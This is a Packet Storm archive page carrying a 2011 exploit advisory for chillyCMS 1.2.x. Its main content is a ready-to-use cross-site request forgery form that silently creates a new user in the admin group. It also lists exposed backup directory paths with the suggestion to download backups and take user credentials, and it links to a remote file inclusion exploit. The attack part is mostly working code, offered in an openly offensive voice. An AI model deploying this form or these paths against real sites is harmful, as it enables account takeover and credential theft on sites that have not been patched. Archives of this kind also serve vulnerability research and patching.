what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

chillyCMS 1.2.x XSRF / File Disclosure

chillyCMS 1.2.x XSRF / File Disclosure
Posted May 22, 2011
Authored by KedAns-Dz

chillyCMS version 1.2.x suffers cross site request forgery and remote file disclosure vulnerabilities.

tags | exploit, remote, vulnerability, file inclusion, info disclosure, csrf
SHA-256 | 2545b5c82fa3df40c9d39eab5aa04640564087f43ce46f64517b580d5cb6b972

chillyCMS 1.2.x XSRF / File Disclosure

Change Mirror Download
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : chillyCMS v1.2.x (CSRF/FD/RFI) Multiple Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page : twitter.com/kedans
# platform : php
# Impact : Remote Cross-Site Request Forgery + Files Disclosure + RFI
# Tested on : [Windows XP sp3 FR] & [Linux.(Ubuntu 10.10) En] & [Mac OS X 10.6.1] & [BSDi-BSD/OS 4.2]
###
# (~) Greetings To : Caddy-Dz (+) JaGo-Dz (+) Dr.Ride (+) All My Friends
###

# (!) Exploit & PoC :

#=(1)======[ (CSRF) Add New User :]=======>

<div class='userform'>
<h1> (CSRF) Add New User :</h1>
<form method='post' action='http://[target]/usersgroups.site.php'>
<table>
<input type='text' name='user' value='KedAns'></input>
<input type='text' name='name' value='Inj3ct0r'></input>
<input type='password' name='pw'></input>
<input type='password' name='pw2'></input>
<input type='text' name='email' value='ked-h@1337day.com'></input>
<input type='radio' name='gids[]' class='middle floatinput' value='1' />
<a class='admin' title='admin' value='Admin Group'></a>
<input type='hidden' name='myaction' value='$action'></input>
<input type='hidden' name='action' value='updateuser'></input>
<input type='hidden' name='id' value='93'></input>
</table>
<input class='button' type='submit' value='Save & Submit'></input>
</form>
</div>

(X) Clouting/Fix : - Non Clouting - !!

#=(2)======[File/Backup Disclosure]=======>

http://[target]/[Path]/backup/ <<+
http://[target]/[Path]/backup/files/ << The Backups is here !

(!) The Access Not Forbidden
(X) Clouting/Fix : restrict access to this directory by .htaccess file Or Create index.html File

[+] Disclose The Backup And Download him .. Get (User/Pass) or What you Want (^_^)

#=(2)======[Remote File Inclusion]=======>

+> References :
[http://1337day.com/exploits/15867]
[http://packetstormsecurity.org/files/view/100510/chillycms-rfi.txt]
[http://www.exploit-id.com/web-applications/chillycms-v1-2-1-remote-file-inclusion-vulnerability]
[http://www.linux-backtrack.com/2011/04/webapps-0day-chillycms-v1-2-1-remote-file-inclusion-vulnerability/]

# (^_^) ! Good Luck ALL ...

#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > Islampard + Z4k1-X-EnG + Dr.Ride
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz
#================================================================================================
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close